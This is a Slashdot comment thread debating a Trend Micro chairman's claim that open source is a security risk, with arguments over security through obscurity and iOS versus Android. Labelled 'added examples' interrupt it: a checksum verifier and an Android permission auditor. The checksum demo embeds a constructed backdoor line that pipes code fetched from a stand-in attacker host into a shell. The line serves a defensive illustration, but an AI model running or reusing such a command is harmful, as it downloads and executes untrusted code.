Trend Micro Chairman Says Open Source Is a Security Risk
dkd903 writes "Steve Chang, the Chairman of Trend Micro, has kicked up a controversy by claiming that open source software is inherently less secure than closed source. When talking about the security of smartphones, Chang claimed that the iPhone is more secure than Android because being an open-source platform lets attackers know more about the underlying architecture."
This comes a week after Trend Micro released a mobile security app for Android.
Just some FUD to sell an app.
In a related story, Trend Micro also noted that Windows has been far more secure than Linux for years due to it being closed source ...
Right. And the color yellow is more secure than the color blue.
There's a spot in User Info for World of Warcraft account names? Really?
people are less secure because attackers know that hitting them on the head with a rock will kill them. that's why there should be no biology taught in school, right?
new sig
Actually the opposite is true, if everyone knows how something works more people can call out the bullshit and fix the problem. With closed source problems can exist that linger forever because no one
the underlying code than trend micro.
First, no one who reads this is suddenly going to be convinced either way. Either you feel that making the code obscure makes it harder to find bugs, or you feel that making the code open makes it easier to fix them. Both are true, for various levels of vendor responsiveness in closed-source code and level of active involvement in open-source code.
If you have a vendor who actively solicits and rewards bug/vulnerability reports, puts a lot of time and money into fixing them, and keeps their source closed, you'll probably have about the best security possible. In the real world, it's not so black and white.
Having said all that, this is pure astroturfing. GAAAAAHHHHH!!! THE FUCKING SCARE MONSTER'S GONNA GET YA IF YOU DON'T BUY OUR SHIT!!!! BUY ANTIVIRUS NOW OR JESUS KILLS A PUPPY!!!!
"This post contains words, known to the State of California to cause thought. Wash brain thoroughly after reading."
They were doing this malarkey at my office a couple of years ago. They were spending all kinds of money on licenses on some sound program from Adobe (it was only going to be used to edit down calls that we recorded in our call center...so, yeah. We didn't really have huge requirements.) I tried convincing them to just use Audacity, but their response was "it's open source, anyone could mess with it, it was probably made by some guy in China, it's free which means it sucks, etc." ::eyeroll:: I tried telling them about how widespread its use is, and how it was made by a former Carnegie-Mellon, current-Google employee, but they weren't having any of it.
Living With a Nerd
It doesn't matter if one person or everyone in the world knows the underlying architecture. If the underlying architecture is junk then the problem is the underlying architecture instead of if it is closed or open source.
and Trend. I spend all my time cleaning up machines that have those products installed and they still get hosed. It's really kind of nice knowing that as long as they exist I will be able to make a living.
That's nice. Of course, I tend to associate Internet security firms with SEO consultants, astrologers, and anyone else who makes a living off fear and ignorance.
Dewey, what part of this looks like authorities should be involved?
I guess I'm not gonna be renewing my network's TrendMicro licenses when they expire next month...
@Mr Chang...
Repeat after me.. security through secrecy only works while your secret is, err, secret..
Now, how many engineers have worked on the iOS platform again? Will they all keep its secrets? Can you guarantee that? Do you realise that by keeping it secret Apple are also restricting the number of white hats that can notify them of security problems before they get exploited?
In modern business it seems the more someone is paid, the more drivel they spout.
"Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
To be fair those are the big three and anyone writing spyware/viruses is going to have a copy of them and won't release their product until it gets past them
I say Steve Chuang is a money-grubbing bastard who steals money from his customers for a service they wouldn't need if everyone would migrate away from Windows and the closed-source hegemony. So there.
It completely fails to surprise me that an AV would have completely given up on the notion of security through technical correctness and have fallen back on the notion of security through obscurity.
The whole idea of OSS security (unlike, say, physical security) is that software bugs and errors are what introduce insecurities, that a technically correct system will be secure even if the attacker knows what it looks like (the same principle as in cryptography). This isn't true of physical systems, because physical materials always have finite strength; but software can (at least in theory, it rarely does) possess technical correctness.
I am, of course, totally unsurprised that an AV company would have completely given up on such a thing, and are falling back on obscurantism and endless layers of bandaids...
I guess things like SHA-1, RSA and AES are also bad and insecure because they are "open", So obscurity is not security now, not that I'd expect much from an AV vendor that ultimately benefits from insecure systems.
I have to constantly find open source malware and virus protection because the server/client TrendMicro package we have at my employer doesn't catch anything.
What Chang is basically saying is that "security through obscurity is inherently more safe than proper implementation" - something that was proven wrong a long time ago. Sure, when you got the implementation right, open source or closed source, extra obscurity won't hurt other than possibly maintenance, but prioritizing it is a misapplication of resources.
So why is this news? Stupid people say stupid things all the time.
The CEO of a computer security company parrots "security through obscurity." Well guess I won't trust any Trend Micro products.
I've used some of Trend Micro's apps in the past and I have to say, they wouldn't know a security risk if it crawled up their collective butt and died. I like their centralized management console, but, aside from that, I've had nothing but bad luck with them. Their products tend to be heavy with ActiveX controls (no security issues there, I'm sure) and they don't generally seem to do a good job anyway. Even keeping right on top of updates, threats are constantly getting through and I have to set up a second perimeter control (a network appliance based on Linux and Tomcat, amusingly enough) to screen out the junk TM's products can't seem to find.
Not to mention the fact that I absolutely hate their licensing terms. I shouldn't have to buy multiple products in a "security package" that all address the same general category of threats just because those threats use different attack vectors.
This silly comment doesn't really influence my decision one way or another, but I seriously doubt I'm going to go with TM's products again once it comes time to either renew support or implement another option.
"This comes a week after Trend Micro released a mobility security app for Android."
Oooooooohhh. Trend Micro wants us to worry about security and then sell us a security app.
Slashdot is News for Nerds: the OP's are supposed to be news whereas the editorializing is supposed to take place in the comments sections. There is a trend around here that the OP's render their opinions now.
I say to the OP's, cut out the snark and leave the snark to those of us in the Peanut Gallery. If you want to color the news with your opinions, get in line with the rest of us and subject your comments to the moderation system.
First, everyone knows how much harder reading reverse-engineered code is compared to skimming a nice commented code.
Second, like it or not, but in some situations, security-through-obscurity actually works (i.e. increases the security). For example, on servers which the attacker can access only via the web browser and the web application UI.
Security through obscurity FTW! Everyone knows that is the best way to secure a system!
"iPhone is more secure than Android because being an open-source platform lets attackers know more about the underlying architecture."
And that guy is the chairman of a computer security company?
no, I don't have a sig
Does this guy really expect to be taken seriously? He claims that iPhone is more secure than Android, and they still launched for iPhone???? I bet they're hoping that Windoze Phone 7 gets some sales (however unlikely that seems right now), so they can scare the victims into buying their security app for that. I reckon that they are starting to see the end for Windoze and the demise of their dismal, unnecessary businesses, so they're trying to scare up business elsewhere.
Good heavens! Oh my, a maker of anti-virus software for the most virus-ridden system in the world claims OSS is insecure? Wow, the shenanigans couldn't be any more obvious. Of course it's more insecure and it's in his best interest to say so. That's business, folks! As always, follow the money. Trend Micro has been in bed with MSFT for a LONG time.
...especially if someone takes an OSS app that is compilable and adds a few backdoors etc. and puts it up on mirrors. Yeah, check the checksums. I do, but how many non-tech geeks even know how to do that? Last company I worked for we provided service contracts for an OSS app and got it PA-DSS certified, fixed a bunch of problems, added features, and most importantly signed our binaries. Most OSS projects don't, and a lot of times are in a format where that is difficult.
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
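The checksum check the comment above refers to, written out as an added example (not code from the original post or from any project named in the thread). It parses a coreutils-style SHA256SUMS list, streams the downloaded file through SHA-256 and fails closed on both a mismatch and a file the list never mentions. The checksum list and the two "downloaded" files are constructed in temporary directories so it runs offline; the appended line standing in for a backdoor is likewise made up for the demo.

```python
"""Verify a downloaded release against a published SHA-256 checksum list.

Added example for the checksum point in the comment above; it is not code from
the original post or from any project named there. The checksum list and both
'downloaded' files are constructed here so the script runs offline.
"""
import hashlib
import hmac
import os
import tempfile


def parse_sha256sums(text):
    """Parse coreutils-style lines ('<64 hex chars>  <filename>') into {filename: hexdigest}.

    A leading '*' on the filename (binary-mode marker) is stripped; blank and
    comment lines are ignored; anything else is rejected rather than guessed at.
    """
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError("malformed checksum line: %r" % line)
        digest, name = parts
        sums[name.lstrip("*")] = digest.lower()
    return sums


def sha256_of_file(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so large tarballs are not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path, sums):
    """Return (ok, reason). Fails closed: a file with no published checksum is rejected."""
    name = os.path.basename(path)
    expected = sums.get(name)
    if expected is None:
        return False, "no checksum published for %s" % name
    actual = sha256_of_file(path)
    if not hmac.compare_digest(actual, expected):
        return False, "checksum mismatch for %s" % name
    return True, "ok"


def demo():
    """Constructed scenario: one genuine file, one mirror copy with a line appended."""
    genuine = b"#!/bin/sh\necho 'release payload'\n"
    tampered = genuine + b"curl http://evil.example/x | sh\n"  # constructed 'backdoor'
    name = "tool-1.0.tar.gz"
    with tempfile.TemporaryDirectory() as upstream, tempfile.TemporaryDirectory() as mirror:
        good = os.path.join(upstream, name)
        bad = os.path.join(mirror, name)
        with open(good, "wb") as f:
            f.write(genuine)
        with open(bad, "wb") as f:
            f.write(tampered)
        # The checksum list is what the upstream project publishes, fetched
        # separately from the mirror that served the file.
        sums = parse_sha256sums("%s  %s\n" % (hashlib.sha256(genuine).hexdigest(), name))
        return (
            verify_download(good, sums),
            verify_download(bad, sums),
            verify_download(os.path.join(mirror, "unlisted.zip"), sums),
        )


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The caveat the comment hints at still applies: a checksum fetched from the same mirror as the file only detects corruption, because whoever replaced the tarball can replace the SHA256SUMS next to it. Catching a hostile mirror needs the list (or the binary) signed with a key obtained out of band, which is the part most projects skip.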
every time someone thinks that closed source is better we have this debate. many eyes = better security
I guess he's never heard of a decompiler?
I guess, if nobody actually gets to look at your source, you're not opening yourself up to ridicule and scorn for the shoddy coding practices and multitude of exploitable errors...
No, the real ridicule comes when hostile crackers discover those exploitable errors through brute force or reverse engineering and, well, exploit them.
Sure, sometimes it can be a case of too many cooks and all that, but when it comes to hunting for security holes I'd think it just plain makes sense to have as many friendly eyes on the code as are willing to spend the time.
"I love animals! Some are cute, others are tasty, what's not to like?" - Betsy Schroeder, Jeopardy contestant
This is complicated.
First, open source vs closed source:
Security problems are just a very nasty subset of quality control issues. Quality code is a function of the quality of programmer, tooling, time schedule, etc.
Open source vs closed source is only one part of that equation, and though I believe it matters, it's not a determining factor BY ITSELF.
Second, Android vs iPhone. There are 2 most likely attack vectors today: browser bugs, and trojans downloaded on purpose that do something other than what they claim.
Android fares worse than iOS on both of these. Both have lots of flaws in the browsers, but Apple is much better about actually allowing their users to patch their own phones (which just blows my mind, I admit, because they are still slow, but it happens.. Android patching rarely happens).
Both have malware available, but it's easier to distribute for Android.
Note that neither has a lick to do with open source vs closed source, it's timely (though SLOW by desktop standards) software updates and quality control vs carrier locked, no-updates-ever and free-for-all downloading.
Blessed are the pessimists, for they have made backups.
I have been giving the whole security argument some thought lately, and I think security through obscurity has merit in the short term. It should be obvious that security holes can be found quicker when you have the source than when you don't. All products have security flaws. All products tend to have more security problems initially and they get corrected over time.
Where open source helps is almost like homoeopathy, to cure your disease, you basically force your body to have symptoms in order to get the immune system working overtime. Open source exacerbates the security threat, initially, finding (and fixing) more of the security holes, that every product has, more quickly. So, at inception, an open source program or package would seem to have way more security holes up front, but once the initial wave passes, it will have far fewer. Closed source, on the other hand, never gets that initial wave, and their security holes get discovered regularly over time, usually very quietly.
A couple cycles of open source, and you'll have something tested to be secure. Using Windows as an example, you'll never be able to have any way to quantify the risk in a closed source package or product.
If that was true then why do we have so many holes in Windows? That is closed source and every time I turn around there is another security hole that has to get patched. I have dual boot machines at home and most of my time doing patches is for the Windows side of things. On the other side of things my Linux boxes at home don't have as many problems with security and when a hole is found a patch is done much more quickly than I could even hope for in Windows.
It has all of the sound of a security vendor trying to scare people into going with a product that they know has problems and then sell them more of their offerings to 'protect'.
Security by obscurity is not security at all. Open source allows anyone to review the code and if there is a problem then a patch can be proposed and the hole is closed quickly. With closed source we don't know (unless you have a disassembler and can read assembler code) what is there and are dependent on the vendor doing timely patches.
One other observation. Security is not absolute, it is a process. This goes for both open source and closed source. What is secure today is not necessarily secure in the future. When holes are found they need to be analysed and fixed.
Panic now, beat the rush!
He's not really wrong necessarily, but every piece of software is a new security risk. Games, email programs, you name it, it's a security risk. It's obviously just a bunch of PR to sell an app. Open Source's greatest risk is also its best potential strength. Because hackers and anyone else can see the underlying code, the security holes that a hacker may exploit will be patched in record time, possibly even by the hacker himself. Meanwhile closed source can only rely on internal resources, not a bad thing necessarily but different. The truth is that Open Source is great, but then again so is closed. Six of one, half a dozen of the other. I really see plenty of room for these two differing development styles to coexist.
There is an old argument that public key cryptography is weaker than a private key system. In public key systems, one key is out there and inherently contains everything an attacker needs to decode a message. We rely on the security of the crypto system to ensure they can't do that. Contrast this to the SAME system where both keys are kept secret - the attacker now has zero information about the keys. It's a bit of weak argument, since we do rely completely on the cryptosystem, but being obscure on top of being effective does help a little bit. That said, I would argue that the mere existence of alureon.h should convince folks that at least one platform (that is closed source) should be avoided.
I am using TrendMicro products every day, and I would say they are a greater security problem than anything else in the world.
The real risk is Trend Micro Chairman, to the security of your wallet.
Just don't give it to him.
You can't handle the truth.
Just take Windows vs Linux as an example. Everyone knows Windows is less of a security risk. It gets hacked less often, has the least amount of exploits and as a bonus even runs faster and more stable!
As he bends over, as he who did not realise it's open source.
The sour grapes or better said "security by obscurity". That philosophy got Sony very far. Go-go TrendMicro !!!
+1 Garage
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
OS manufacturers are like sharks, they don't care what they eat as long as they get enough of it.
AV vendors are like those cleaner fish, who have no purpose in life than to eat the little bits of shit between the sharks teeth.
No-one really cares what they say, cos everyone knows they just want a little bit more shit to eat.
The Sharks tolerate them, but only because its hides the fact they don't clean their own teeth.
Using closed source software is like putting an admin in the woods at night with a thousand attackers and telling him to catch the attackers before they break into your treasure chest. By the time the admin catches one, the chest has already been looted and the admin spends the rest of his time patching up the loophole while the other attackers are already preparing their next break-in. A good admin shouldn't be measured by how well they handle damage control but how well they can analyze a new piece of software prior to business implementation. Obscurity is just another label for "I'm too lazy to look at source code, so I'm going to take out a giant insurance policy instead and hope that Snake Oil's interns weren't complete dunces when they wrote this software."
Security through obscurity is better for our sales. OSS contains far too few bugs to make our products necessary.
(Not that TM produced any good protection software, to be blunt for a change. Sorry, but given the choice between TM, McAfee and Panda I'd probably choose... a bullet).
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
And as long as MS produces OSs, I'll be able to make a living coding AV software.
Imagine a world of OSS only. Can you see how we'd be out on the street selling pencils and apples?
Closed source gives me a job! Hurray for CSS!
it'd be a shame if something happened to it.
Security through obscurity isn't inherently a bad thing. It's only considered bad when this is what companies rely on for all their security needs. If security through obscurity is coupled with other proven measures of security, it usually improves on the already good security. True, open design is something to be desired by some, but it's not a requisite for good security. There is and never was a guarantee that just because it's open source means it's secure--just like being closed source doesn't guarantee that the product is insecure.
Trend Micro makes its business off of being good at protecting devices from and detecting malware. I doubt that they have uninformed security professionals at the helm when they want to be the best out there.
In closing, I'm not trying to start a flame war, I'm just saying that shouting "SECURITY THROUGH OBSCURITY DOESN'T WORK" isn't entirely correct and doesn't automatically make you genius. Also, just because Chang is the chairman of a company doesn't mean he's retarded.
Came to post exactly that. Trend Micro has just proven that as a tech company they don't even understand basic security.
Well, I typically buy it for cheap, but I guess I won't be purchasing any more Trend Micro software.
Anyone that knows anything about computer security just lost all respect and sense of credibility for Trend Micro with this idiot-leader's claim.
Unfortunately, it is not often that security experts are responsible for making purchase decisions. The more those who make purchase decision hear about a company making claims in support of "the defacto norm" and deriding "the new thing" it reinforces the "decisions not to change" that are frequently made by people who simply don't know the truth.
There is more money to be made by resisting change and improvement, especially when that change is in favor of free and open source software. "Leader of well known security expert company says not changing is good" simply helps to reinforce the inertia of non-change. So now decision makers can feel more justified in their not making decisions and calling it "decision not to change" without actually doing anything or learning anything.
So, major corporations, focused mostly on profit, care more about device security than the owners of those devices? Interesting.
I'm just glad I can short-circuit Sprint's broken agps with a simple iptables rule on my Palm Pre. Voila! A GPS that works quickly and properly. No hacking required. Open platforms FTW.
Just watched a video of a Facebook engineer saying that Trend Micro has one of the largest HBase installations.
They should rip it out as it is inherently insecure.
Not news.
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
This is a serious question and not a troll... but how can you guarantee security if you don't control who can contribute to a project? For example, let's say that I write a huge contribution... (for example, I provided all of the drivers required for all of the major graphics cards.) In this code, I include a very obfuscated snippet of code that manages to give me control of any device. How can you detect this?
I understand that anyone can view the source, but what if nobody cares to look? What if those who do care to look are not good enough to spot the error? (see www.ioccc.org)
However, a closed-source program has a company that is financially liable if something fails. In addition, they have some kind of background check on the coders. If something does go wrong, you can hold someone else accountable. How can you hold an open-source community accountable?
I really don't understand, so an executive summary would be great. (I do hate the WOT)
The vast majority of millions of open source projects only have a few eyes on them.
Only projects like Linux kernel, apache, and a few others can claim "many eyes".
For the rest, security through obscurity would have been a better choice.
# curl -i http://us.trendmicro.com/
HTTP/1.1 301 Moved Permanently
Server: Apache
etc...
Hmm.
Counter-example. I reverse engineered part of a device to permit me to write my own software to interact with it. The results were useful to a community of a few thousand people. In return, some people sent me information they had for the device. I now have access to data sheets of its components, OS dumps, interface definitions, the results of various other bits of reverse engineering efforts, even full schematics of all the hardware.
Now remind me again, how does being closed source make a product more secure again?
Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
Nice Strawman there!
There are many ways to skin a cat and many safeguards that can be used to secure an OS.
Open source makes it easy to find which ones are in use and closed source makes it difficult.
The message is that good design plus obscurity beats just good design. That, at least, is the theory behind steganography.
I'm a Programmer. That's one level above Software Engineer and one level below Engineer.
A security company chairman advocating security through obscurity. I certainly buy any Trend Micro products now.
And what a fucking retard anyways. Christ PKI is a frickin' open standard, but it doesn't matter the least whether a potential attacker can read the specs, it isn't going to help him bust into my OpenVPN network any bloody better.
The world's burning. Moped Jesus spotted on I50. Details at 11.
Antisemitics: "[Jews] are [feeding on our babies' blood] and must be eradicated."
AntiFOSSes: "[Open Source developers] are [putting back doors into our computers] and must be eradicated."
Obi-Wan: "I felt a great disturbance in the Force, as if millions of voices suddenly cried out in terror and were sudden
Everybody knows that any code written by an attacker would have to be made freely available per the open source license. I don't see what the problem is.
Hence trend micro's most trusted software being open source?
http://ossec.net
Everyone knows that if you leave your key under the doormat and you tell nobody, your house is *far* more secure than when you install a drawbridge, dig a moat around it, put alligators in the moat and then give out blueprints for the drawbridge, moat and alligators. And that, my fellow Slashdotters, is why nobody uses drawbridges anymore.
This guy could have been Pope in the middle ages. The church funded all of the technological research and did all of the publishing in the middle ages, including Galileo, and they did it "closed source" where they only shared the information in a very small group. When someone they funded came up with "stupid ideas" they quit publishing the data and came down hard on the researcher, again Galileo. Over a thousand years later, after figuring out closed source research was really dumb, Microcrap and this idiot at Trend Micro want to take us back into the European middle ages.
What a maroon! And just how secure is Windows (proprietary OS) compared to Linux (open source)? IMHO, there is no comparison. I can't run Windows for more than a day without being inundated with virus attacks, and an occasional infection. I have been running Linux systems continuously and actively for 10 years and have yet to get a virus, rootkit, or other malware infection.
Sometimes, real fast is almost as good as real-time.
we should all stop using deadbolts, because everyone knows how they work!
What a bonehead. The iPhone which is based on BSD, is "open" similar to Android which is based on Linux. What this yahoo doesn't understand is the distribution model. The iPhone is "more secure" because it's tightly controlled by Apple and the carriers. The only way john q public can install software is via the App Store, where the software is vetted. Anyone can become a developer for the iPhone and gain unfettered access. Users can also 'jailbreak' iPhone and install anything. Due to this, the iPhone technically is no more secure than any other phone; iOS has just as many "vulnerabilities" as any other mobile OS... It's all about the software distribution model. The majority of users will never see or care about what's under the hood. They'll buy their wares from a safe warehouse, which makes targeting the platform with malware pointless, cause it can't gain any traction. Android could adopt the same distribution model and become just as "secure" as iPhone while still being "open". Essentially, there is no difference between iPhone and Android besides the distribution model. Being "open" doesn't make Android any less secure - it's the distribution model for average users to obtain software that makes the difference.
Obviously iOS is much more secure than Android:
Steve Chang, Chairman and Founder, a competent business leader according to the Trend Micro website (http://us.trendmicro.com/us/about/company/management/).
Quote:
"Under his leadership, Trend Micro grew to over 2000 employees with operations in more than 30 countries. From 1994 to 2003, revenues increased from US$10M to US$454."
No wonder he's so desperate to sell his vaporware.
“Apple has a sandbox concept that isolates the platform, which prevents certain viruses that want to replicate themselves or decompose and recompose to avoid virus scanners,”
APPLE - SECURITY
Products Affected
iPhone, Product Security
iPhone v2.1
Application Sandbox
CVE-ID: CVE-2008-3631
Available for: iPhone v2.0 through v2.0.2
Impact: An application may be able to read another application's files
Description: The Application Sandbox does not properly enforce access restrictions between third-party applications. This may allow a third-party application to read files in another third-party application's sandbox, and lead to the disclosure of sensitive information. This update addresses the issue by enforcing the proper access restrictions between application sandboxes. Credit to Nicolas Seriot of Sen:te and Bryce Cogswell for reporting this issue. This issue does not affect iPhone versions prior to v2.0.
ANDROID - SECURITY
Security Architecture
A central design point of the Android security architecture is that no application, by default, has permission to perform any operations that would adversely impact other applications, the operating system, or the user. This includes reading or writing the user's private data (such as contacts or e-mails), reading or writing another application's files, performing network access, keeping the device awake, etc.
Because the kernel sandboxes applications from each other, applications must explicitly share resources and data. They do this by declaring the permissions they need for additional capabilities not provided by the basic sandbox. Applications statically declare the permissions they require, and the Android system prompts the user for consent at the time the application is installed. Android has no mechanism for granting permissions dynamically (at run-time) because it complicates the user experience to the detriment of security.
The kernel is solely responsible for sandboxing applications from each other. In particular the Dalvik VM is not a security boundary, and any app can run native code (see the Android NDK). All types of applications — Java, native, and hybrid — are sandboxed in the same way and have the same degree of security from each other.
Guess that Apple Sandbox technology has its problems too. And did you know that the sandbox is integrated into the Android kernel? Mr. Steve Chang didn't do his homework. Or... did he?
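The Android text quoted above says apps declare the permissions they want statically and the user is asked once, at install time. What a reviewer actually does with that is read the manifest before the install prompt ever appears. The script below is an added example, not code from the original post, from Android, or from Trend Micro: it pulls every uses-permission entry out of a manifest, lists what the install prompt would ask for, and flags the combination the thread's "trojan that does something other than what it claims" scenario relies on. The manifest is constructed (a "flashlight" app that wants contacts and the network), the sensitive-permission set and the exfiltration heuristic are this example's own review rules rather than any Android classification, and it assumes the manifest is already plain XML (source tree or apktool/aapt output), not the binary XML packed inside an APK.

```python
"""Audit the permissions an Android app statically declares in its manifest.

Added example illustrating the statically declared permission model quoted
above; it is not code from the original post, from Android, or from Trend
Micro. The manifest is constructed, and the SENSITIVE set and the exfiltration
heuristic are this example's own review rules, not an Android classification.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Permissions that read private user data or cost the user money; a reviewer
# should ask why a given app needs any of them.
SENSITIVE = {
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
    "android.permission.CALL_PHONE",
    "android.permission.READ_PHONE_STATE",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECORD_AUDIO",
}
NETWORK = {"android.permission.INTERNET"}


def declared_permissions(manifest_xml):
    """Return the <uses-permission android:name=...> values in declaration order, deduplicated."""
    root = ET.fromstring(manifest_xml)
    seen, perms = set(), []
    for el in root.iter("uses-permission"):
        name = el.get("{%s}name" % ANDROID_NS)
        if name and name not in seen:
            seen.add(name)
            perms.append(name)
    return perms


def audit(manifest_xml):
    """Summarise what the install-time prompt will ask for, plus review flags."""
    perms = declared_permissions(manifest_xml)
    flagged = [p for p in perms if p in SENSITIVE]
    notes = []
    if flagged and any(p in NETWORK for p in perms):
        notes.append("reads private data and has network access: possible exfiltration path")
    return {"all": perms, "flagged": flagged, "notes": notes}


# Constructed sample: a 'flashlight' app that asks for contacts and the network.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WAKE_LOCK"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Flashlight"/>
</manifest>
"""

if __name__ == "__main__":
    report = audit(SAMPLE_MANIFEST)
    print("declares:", ", ".join(report["all"]))
    print("flagged: ", ", ".join(report["flagged"]) or "none")
    for note in report["notes"]:
        print("note:", note)
```

The point of flagging the combination rather than single permissions is that neither INTERNET nor READ_CONTACTS is suspicious on its own; a flashlight that has both is the case the install prompt shows the user but most users click through, which is exactly the distribution-model problem several comments in this thread raise.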
Trend Micro Chairman Says Open Source Is a Security Risk
I think someone slipped and mixed up their words, because open source software is generally less of a security risk than is Trend Micro software.
This is a hacked account, for which the owner can not be held responsible.
Nobody should doubt that he is correct, because as we all know, open source software has a terrible reputation for security when compared to closed source software. Over and over, headlines trumpet breaches of OSS while CSS quietly performs with astonishing perfection.
Right? Right? That's what Trend Micro is saying, right?
After all, you don't see any tyrannosauruses 'round here, do ya?
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
So I know what not to buy?
There are zero ways to jailbreak my shoe.
Sorry about that, Chief.
Oh, I'm sorry sir, I thought you were referring to me, Mr. Wensleydale.
Open Source is a risk to Trend because ClamAV is open source. They have tried to sue ClamAV out of existence before. Funny story: Trend gives the sysadmin no way to uninstall their products when migrating. I had to replace Trend with SEP. A kludgy script to stop services, delete files and registry keys, and get their shim out of the TCP/IP stack was the only way to do it. Their support sucks, as I can personally attest. On several occasions, I have fixed my problems with IMSS on Solaris while on a support call with their call center in the Philippines. On one occasion, latency in pattern update installs caused a large newspaper for which I worked to contract a virus that put all the Windows servers in a reboot cycle. I had to get a list of IPs of infected servers from a Solaris box so the Windows admin could manually disinfect with NTFSDOS Pro.
Normally, both open and closed source have security advantages. Open source programs can be vetted by anybody, and changes can be (and usually are) applied quickly. Closed source programs are a bit harder to hack into, and it's more likely that somebody's actually paid for a good security analysis (although I'm not sure Apple does - as far as I can tell, they understand security less than Microsoft does).
In the case of mobile phones, the user may not have the ability to upgrade the software, and the people who can may simply not care. That nullifies the advantages of open source, and may leave closed source as more secure. At least if Apple has designed iOS intelligently with respect to security.
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
1) If closed source is more secure, then why is he writing security software to "secure" it?
2) If open source is so much less secure, then there must be a viable market to tap. All those CEOs who want to make *billeens and billeens of dollars* for the greedy investors, please speak now. <sound of crickets>
The reality check is that Open Source is doing just fine in keeping up with the problem of software vulnerabilities leading to the likes of massive bot-nets which have become the bane of our society. By Chang's own definition of "secure" he is targeting the wrong market, yet the market he is targeting is the one with all the problems in need of being fixed, but he has done nothing to change that. His own products have done nothing to "secure" even the most "secure" systems out there. He should be removed from being CEO as he has proven that he is both ineffective as a corporate officer, and he has proven that he doesn't even understand the market that he should be marketing to. In either case he is a poor excuse for a CEO of a publicly traded company.
Although Android is open source, actually installing new software on real-world devices is usually difficult and generally requires hacks. Unlike Linux or Firefox or whatever, where a fix may be in a point release soon after it's known about, if a flaw is found on an Android handset, it may only be fixed months down the track in a manufacturer update, or it may never be fixed (unless someone has fixed it in a custom ROM and you are willing to go through all the sometimes-tricky steps to install those ROMs).
That Steve Chang is not considered a security expert ... The reason Android is less secure is due to implementation choices. If he believes that the iPhone OS has not been ripped apart to its very basic structures, he is wrong. The jailbreak community developed sophisticated tools for just that, and the Objective-C language itself lends itself to easy discovery. The quality of the code written with a mindful recognition of security issues is why it may be more secure than Android. Consider that the tools used to create each are mainly open source code, that interface discovery is possible on both, and that I can profile the execution of code on either platform. (And Apple nicely provides me a simulator where 90% of this can be done without the issues of debugging on the device.) Add to that the issue that Android is on a plethora of platforms, and iPhone is on one architecture with incremental improvements. Well, iPhone has to be better designed than Android to put up the fight it puts up.
In addition, Apple addresses the bugs in their platforms more promptly and is the single source of software updates. The Google Android environment involves too many players and too much finger pointing, and has issues such as the manufacturers responsible for pushing updates to the phones delaying those updates to push new phone models. So security fails for Android for commercial conflicts as well.
The assertion that open source is less secure than closed source is laughable considering that the majority of network-connected machines rely on open source components for security, outside of Windows architecture machines (which might arguably be the majority of connected machines but are calculably the largest source of security issues).
FUD in the security field is unacceptable and, when found out, I think grounds for corporate punishment if done by executives to push their products on the uninformed.
- Tjp
I am in wallow with my inner money grubbing capitalistic pig. ... Oink!
Why do people allow chairmen to make ignorant remarks like that? Friends don't let friends make asinine remarks about security without at least understanding the issues: Kerckhoffs's Principle.
Please, someone, tell the poor soul that they are using an open-source program.
$ curl --head http://us.trendmicro.com/us/home/
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Date: Sat, 15 Jan 2011 03:07:03 GMT
Connection: keep-alive
Remember when the jailbreakers fixed iOS's PDF exploit before Apple did? Good times.
Would it be true to say that a greater proportion of iPhone users are less security conscious? (The nice way of saying that a majority of iPhone users are dumb technophobes that wouldn't know how to exercise good security.)